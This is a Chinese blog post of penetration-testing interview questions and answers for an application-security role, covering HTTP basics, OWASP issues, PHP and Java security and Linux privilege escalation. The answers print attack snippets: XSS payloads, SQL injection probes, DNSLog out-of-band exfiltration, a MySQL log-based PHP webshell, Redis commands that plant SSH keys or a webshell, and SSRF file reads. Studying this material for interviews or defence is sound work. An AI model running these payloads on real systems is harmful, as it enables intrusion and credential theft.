2025年渗透测试面试题总结-匿名[校招]攻防研究员(应用安全)(题目+回答)

article/2025/7/14 0:08:33

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 匿名[校招]攻防研究员(应用安全)

基础部分

1. HTTP状态码

2. HTTP请求方法及作用

3. 网络分层及协议

OWASP Top 10

1. XSS代码执行方式

2. XSS常用标签及绕过

3. HttpOnly的作用及绕过

4. 判断SQL注入存在

5. 无回显注入处理

6. MySQL延时注入其他姿势

7. DNSLog原理

8. 单引号被拦截绕过

9. MySQL写Shell的其他方式

10. Redis利用命令

11. SSRF利用

PHP安全

1. 审计流程

2. 命令执行函数

3. 文件上传函数

4. 代码执行函数

5. Vendor目录作用

6. PHPUnit漏洞

7. 无文件Shell实现

Java安全

1. 通用漏洞组合利用

2. 命令执行函数

3. 框架审计重点

4. 审计流程与关注点

5. Tomcat回显构造

6. 内存马实现

其他

1. POC/EXP开发心得

2. Linux提权姿势

3. 渗透关注文件

4. Dirty Cow时间及修复

5. 未提及的擅长点

 匿名[校招]攻防研究员(应用安全)

### 基础1. http状态码,502,503,501
2. http请求方式及各自作用
3. 计算机网络的分层及分别有哪些协议### **owasp top 10**1. xss如何执行代码
2. xss常用哪些标签
3. http only
4. 怎样判断是否存在注入
5. sql注入无回显怎么办
6. 延时注入除了sleep的其他姿势(mysql)
7. dnslog的实现原理
8. sql注入,单引号被拦截,如何绕过
9. sql注入,写shell的语句,除了into outfile还有什么mysql的特性可以getshell
10. redis的利用,如何shell,相关命令
11. ssrf的原理即后利用,怎么执行命令,常搭配使用的协议### PHP安全相关1. 审计流程
2. 命令执行函数
3. 文件上传函数
4. 代码执行函数
5. vender目录
6. phpunit
7. php可以构造无文件shell吗### **Java安全相关**1. 挖过的通用洞,你会怎么利用(组合)
2. 命令的函数或包
3. java哪些框架,审过哪些框架,它们常出现的问题是什么
4. 审计流程,你一般关注哪些洞,或擅长挖哪种类型
5. tomcat做回显
6. 内存马的实现### **其他**- 写poc/exp的经历和心得
- 复现的一些漏洞
- Linux 提权的姿势
- Linux下有哪些文件进行渗透时比较关注的,及文件权限问题
- dirty cow 的时间及其修复版本(哪年后就没法用了)
- 你觉得什么是你自己比较擅长的而我没有问到的. ### **小结**这个岗位主要是搞漏洞挖掘和利用以及原理分析,Web方面就是JAVA和PHP的安全研究,比如JAVA下的流行框架,组件和服务器应用的安全问题。 没有问内网!!!

基础部分


1. HTTP状态码
  • 502(Bad Gateway):代理服务器从上游服务器接收到无效响应。常见于反向代理配置问题。
  • 503(Service Unavailable):服务器暂时无法处理请求,通常因维护或过载。
  • 501(Not Implemented):服务器不支持请求方法(如使用非标准的HTTP方法)。
2. HTTP请求方法及作用
  • GET:获取资源(无副作用)。
  • POST:提交数据(如表单)。
  • PUT:替换目标资源。
  • DELETE:删除资源。
  • HEAD:获取资源的元信息(不返回Body)。
  • OPTIONS:查询服务器支持的请求方法。
3. 网络分层及协议
  • 应用层:HTTP、FTP、DNS、SMTP。
  • 传输层:TCP(可靠传输)、UDP(低延迟)。
  • 网络层:IP、ICMP、ARP。
  • 数据链路层:Ethernet、PPP。
  • 物理层:物理介质规范。

OWASP Top 10


1. XSS代码执行方式
  • 反射型:攻击载荷通过URL参数注入并反射到页面执行。
  • 存储型:恶意脚本存储到数据库(如评论字段),用户访问时触发。
  • DOM型:由前端JavaScript操作DOM时触发(无需服务端参与)。
2. XSS常用标签及绕过
  • 经典标签<script>, <img src=1 onerror=alert(1)>, <svg/onload=...>
  • 事件属性onmouseover, onload, onerror
  • 编码绕过:Hex/Unicode编码(如javascript:alert(1)\x6A\x61...)。
3. HttpOnly的作用及绕过
  • 作用:防止JavaScript读取Cookie(缓解XSS窃取会话)。
  • 绕过:通过其他漏洞(如浏览器缓存劫持、中间人攻击)获取Cookie。
4. 判断SQL注入存在
  • 报错型:输入单引号触发数据库错误(如'You have an error...)。
  • 布尔盲注:构造AND 1=1AND 1=2观察页面差异。
  • 时间盲注:通过SLEEP()判断响应延迟。
5. 无回显注入处理
  • 外带数据:利用DNSLog或HTTP请求外传数据(如LOAD_FILE('\\\\xxx.dnslog.cn\\test') )。
  • 盲注攻击:布尔或时间盲注逐位提取数据。
6. MySQL延时注入其他姿势
  • Benchmark函数BENCHMARK(1000000, MD5('test'))
  • 条件运算IF(1=1, SLEEP(5), 0)
7. DNSLog原理
  • 实现:攻击者控制域名服务器,触发目标解析特定子域名(如payload.attacker.com ),通过DNS查询日志获取注入结果。
8. 单引号被拦截绕过
  • 宽字节注入:利用GBK编码转换(如%df%27 → 吞掉转义符)。
  • 数字型注入:无需引号的注入点(如id=1 AND 1=1)。
9. MySQL写Shell的其他方式
  • 日志文件写入
    sqlSET global general_log = 'ON'; SET global general_log_file = '/var/www/html/shell.php'; SELECT '<?php @eval($_POST[1]);?>'; 
  • 全局变量:利用secure_file_priv为空时直接写文件。
10. Redis利用命令
  • 写SSH密钥
    bashconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save 
  • 写Webshell
    bashconfig set dir /var/www/html set x "<?php system($_GET['cmd']);?>" save 
11. SSRF利用
  • 原理:服务端发起任意HTTP请求,攻击内网或本机服务。
  • 协议利用
    • File协议:读取本地文件(file:///etc/passwd)。
    • Gopher:构造TCP流量攻击内网Redis/MySQL。
  • 命令执行:结合CRLF注入或协议特性(如Redis的eval命令)。

PHP安全


1. 审计流程
  1. 入口点分析:定位用户输入($_GET$_POST)。
  2. 危险函数跟踪:如evalsystemunserialize
  3. 参数传递路径:追踪变量是否未过滤直接进入敏感函数。
2. 命令执行函数
  • 高危函数systemexecpassthrushell_exec、反引号(`)。
  • 间接执行popenproc_open
3. 文件上传函数
  • 核心函数move_uploaded_file(结合is_uploaded_file验证)。
  • 漏洞场景:未校验后缀/MIME类型,或黑名单不全(如.phar绕过)。
4. 代码执行函数
  • 动态执行evalassertcreate_function
  • 回调函数array_mapcall_user_func
5. Vendor目录作用
  • 用途:存放Composer依赖包,可能包含漏洞组件(如未更新的guzzlehttp)。
6. PHPUnit漏洞
  • 历史漏洞:CVE-2017-9841(远程代码执行,因eval-stdin.php 未删除)。
7. 无文件Shell实现
  • 内存驻留:通过反序列化漏洞加载恶意类(需unserialize可控)。
  • 伪协议:利用php://input执行代码(需allow_url_include=On)。

Java安全


1. 通用漏洞组合利用
  • 框架漏洞:Struts2 OGNL注入 + Fastjson反序列化。
  • 组件链:利用commons-collections链触发RCE。
2. 命令执行函数
  • 核心类Runtime.getRuntime().exec()ProcessBuilder
  • 反射调用:通过反射绕过黑名单检测。
3. 框架审计重点
  • Spring:SPEL表达式注入(CVE-2022-22963)、未授权端点。
  • Hibernate:HQL注入(非预编译查询)。
  • Fastjson:反序列化漏洞(利用AutoType特性)。
4. 审计流程与关注点
  • 入口点:HTTP请求处理、RPC接口、JSON/XML解析。
  • 擅长方向:反序列化链构造、表达式注入、权限绕过逻辑。
5. Tomcat回显构造
  • 线程注入:通过反射获取Response对象(如从ThreadLocal提取)。
  • 内存马适配:注入Filter或Servlet动态注册恶意逻辑。
6. 内存马实现
  • Filter型:插入恶意Filter到责任链头部。
  • Agent型:动态修改字节码(如利用javassist)。

其他


1. POC/EXP开发心得
  • 关键点:漏洞触发条件精准复现、兼容性处理(如版本差异)。
  • 案例:Fastjson反序列化EXP需构造特定Gadget链。
2. Linux提权姿势
  • 内核漏洞:Dirty Cow(CVE-2016-5195)、sudo权限滥用(CVE-2021-3156)。
  • SUID滥用:find、vim等可执行文件提权。
3. 渗透关注文件
  • 敏感文件/etc/passwd/etc/shadow、SSH密钥(~/.ssh/id_rsa)。
  • 权限问题:全局可写文件(find / -perm -o=w)。
4. Dirty Cow时间及修复
  • 时间:2016年10月披露,影响Linux内核≤4.8.3。
  • 修复版本:4.8.3以上内核已修补。
5. 未提及的擅长点
  • 反序列化漏洞链分析:Java/PHP反序列化利用链构造与调试。
  • 框架组件0day挖掘:基于源码分析或黑盒Fuzz。

http://www.hkcw.cn/article/CPNEKkdEEW.shtml

相关文章

区域未停留检测算法AI智能分析网关V4打造铁道/工厂/机场等场景应用方案

一、背景 在工业生产、公共场所管理等场景中&#xff0c;特定区域的人员/物体停留时间管控关乎作业效率与安全。传统监控系统仅能录像存证&#xff0c;无法主动分析停留行为。AI智能分析网关V4的区域未停留检测功能&#xff0c;依托智能算法实现实时监测与异常告警&#xff0c…

第Y5周:yolo.py文件解读

&#x1f368; 本文为&#x1f517;365天深度学习训练营 中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 本次任务&#xff1a;将YOLOv5s网络模型中的C3模块按照下图方式修改形成C2模块&#xff0c;并将C2模块插入第2层与第3层之间&#xff0c;且跑通YOLOv5s。 任务…

无人机桥梁3D建模、巡检、检测的航线规划

无人机桥梁3D建模、巡检、检测的航线规划 无人机在3D建模、巡检和检测任务中的航线规划存在显著差异&#xff0c;主要体现在飞行高度、航线模式、精度要求和传感器配置等方面。以下是三者的详细对比分析&#xff1a; 1. 核心目标差异 任务类型主要目标典型应用场景3D建模 生成…

【FlashRAG】本地部署与demo运行(一)

FlashRAG 简介 FlashRAG 是一种高效检索增强生成&#xff08;Retrieval-Augmented Generation, RAG&#xff09;技术&#xff0c;旨在优化大规模语言模型&#xff08;LLMs&#xff09;的推理性能&#xff0c;尤其在处理长上下文或复杂查询时。其核心特点是结合了快速检索与动态…

低功耗架构突破:STM32H750 与 SD NAND (存储芯片)如何延长手环续航至 14 天

低功耗架构突破&#xff1a;STM32H750 与 SD NAND &#xff08;存储芯片&#xff09;如何延长手环续航至 14 天 卓越性能强化安全高效能效图形处理优势丰富集成特性 模拟模块实时监控保障数据完整性提升安全性与可靠性测量原理采样率相关结束语 在智能皮电手环及数据存储技术不…

MySQL之约束和表的增删查改

MySQL之约束和表的增删查改 一.数据库约束1.1数据库约束的概念1.2NOT NULL 非空约束1.3DEFAULT 默认约束1.4唯一约束1.5主键约束和自增约束1.6自增约束1.7外键约束1.8CHECK约束 二.表的增删查改2.1Create创建2.2Retrieve读取2.3Update更新2.4Delete删除和Truncate截断 一.数据库…

在线制作幼教早教行业自适应网站教程

你想知道怎么做自适应网站吗&#xff1f;今天就来教你在线用模板做个幼教早教行业的网站哦。 首先得了解啥是自适应网站。简单说呢&#xff0c;自适应网站就是能自动匹配不同终端设备的网站&#xff0c;像手机、平板、电脑等。那如何做幼早教自适应网站呢&#xff1f; 在乔拓云…

[特殊字符] 超强 Web React版 PDF 阅读器!支持分页、缩放、旋转、全屏、懒加载、缩略图!

在现代 Web 项目中&#xff0c;PDF 浏览是一个常见需求&#xff1a;从政务公文到合同协议&#xff0c;PDF 文件无处不在。但很多方案要么体验不佳&#xff0c;要么集成复杂。今天&#xff0c;我给大家带来一个开箱即用、功能全面的 PDF 预览组件 —— [PDFView](https://www.np…

裂缝仪在线监测装置:工程安全领域的“实时守卫者”

在基础设施运维领域&#xff0c;裂缝扩展是威胁建筑结构安全的核心隐患之一。传统人工巡检方式存在效率低、时效性差、数据主观性强等局限&#xff0c;而裂缝仪在线监测装置通过技术迭代&#xff0c;实现了对结构裂缝的自动化、持续性追踪&#xff0c;为工程安全评估提供科学依…

语音通信接通率、应答率和转化率有什么区别?

语音通信中的接通率、应答率和转化率是三个不同的关键指标&#xff0c;它们各自具有独特的定义和衡量标准&#xff0c;以下是它们之间的区别&#xff1a; 一、定义 1. 接通率&#xff1a; • 是指成功接通的电话数量占总拨打电话数量的百分比。具体来说&#xff0c;只要被叫响…

俄称击落千余架乌军无人机 乌称击退俄28次进攻

当地时间5月30日,俄罗斯国防部发布战报称,在过去一周里,俄军对乌境内的国防工业设施、军用机场基础设施、武器弹药储存设施等目标实施打击。俄军在苏梅、哈尔科夫、顿涅茨克等方向打退乌军多次进攻并发动攻势。俄防空部队击落乌军1439架固定翼无人机。此外,俄军控制了苏梅、…

阿富汗今年已有357人死于麻疹 大部分是儿童

据世界卫生组织报告显示,截至5月25日,阿富汗今年已记录了超过55000例麻疹疑似病例,其中已有357人死亡,死者大部分是儿童。当地医务系统专家认为,疫苗缺乏和营养不足是疾病快速传播的重要原因。目前阿富汗有1580万人吃不饱饭,大量儿童营养不良,难以抵御疾病侵袭,需要获得…

从双向奔赴到分道扬镳 “马特”组合缘何分手

当地时间5月30日,美国总统特朗普和美国企业家、政府效率部负责人埃隆马斯克在白宫举行新闻发布会。这是马斯克在政府效率部的最后一天。马斯克28日在社交媒体上说,他即将离开特朗普政府,不再继续担任“特别政府雇员”一职。这也意味着,马斯克在1月20日就任美国政府效率部负…

Form开发指南-第一弹:开发背景与基础环境

1 用户和常用工具 1.1 区分3类用户 OS用户&#xff1a;包括超级用户root&#xff0c;应用OS用户如applprod&#xff0c;数据库OS用户oraprod。数据库用户&#xff1a;包括内置管理用户sys、system&#xff0c;EBS用户apps&#xff0c;EBS各模块用户applys、gl、inv、po、ar、…

基于LBS的上门代厨APP开发全流程解析

上门做饭将会取代外卖行业成为新一轮的创业风口吗&#xff1f;杭州一位女士的3菜一汤88元套餐引爆社交网络&#xff0c;这个包含做饭、洗碗、收拾厨房的全套服务&#xff0c;正在重新定义"到家经济"的边界。当25岁的研究生系着围裙出现在客户厨房&#xff0c;当年轻姑…

Bootstrap项目 - 个人作品与成就展示网站

文章目录 前言一、项目整体概述1. 项目功能介绍1.1 导航栏1.2 首页模块1.3 关于我模块1.4 技能模块1.5 作品模块1.6 成就模块1.7 博客模块1.8 联系我模块 2. 技术选型说明 二、项目成果展示1. PC端展示1.1 首页1.2 关于我1.3 技能1.4 作品1.5 成就1.6 博客1.7 联系我 2. 移动端…

QML 滑动与翻转效果(Flickable与Flipable)

目录 引言相关阅读核心组件解析Flickable基础属性Flipable核心特性 示例解析示例1&#xff1a;可滑动列表&#xff08;FlickableDemo&#xff09;示例2&#xff1a;可翻转卡片&#xff08;FlipableCard&#xff09; 总结下载链接 引言 Qt Quick 框架提供的 Flickable 与 Flipa…

氮气吹扫电磁阀

一、氮气吹扫电磁阀的概述 氮气吹扫电磁阀是一种重要的工业自动控制设备&#xff0c;用于对工业设备中出现的杂质和沉淀物进行清理&#xff0c;以保证生产线的畅通和生产效率的稳定。其作用是在需要吹扫清洗的工业设备中&#xff0c;通过控制气源的气压&#xff0c;打开电磁阀…

【香港科大+华为诺亚方舟】Web Reconstruction方法:从原始网页文档合成高质量指令遵循数据,效果显著,代码开源

论文名称&#xff1a;Instruction-Tuning Data Synthesis from Scratch via Web Reconstruction 论文链接&#xff1a;https://arxiv.org/abs/2504.15573 机构&#xff1a;香港科技大学 华为诺亚方舟实验室 Github代码链接&#xff1a;https://github.com/YJiangcm/WebR 个人文…

星际巡航-第16届蓝桥第6次STEMA测评Scratch真题第4题

[导读]&#xff1a;超平老师的《Scratch蓝桥杯真题解析100讲》已经全部完成&#xff0c;后续会不定期解读蓝桥真题&#xff0c;这是Scratch蓝桥真题解析第233讲。 第16届蓝桥第6次STEMA测评已于2025年4月13日落下帷幕&#xff0c;编程题一共有5题&#xff08;初级组只有前4道编…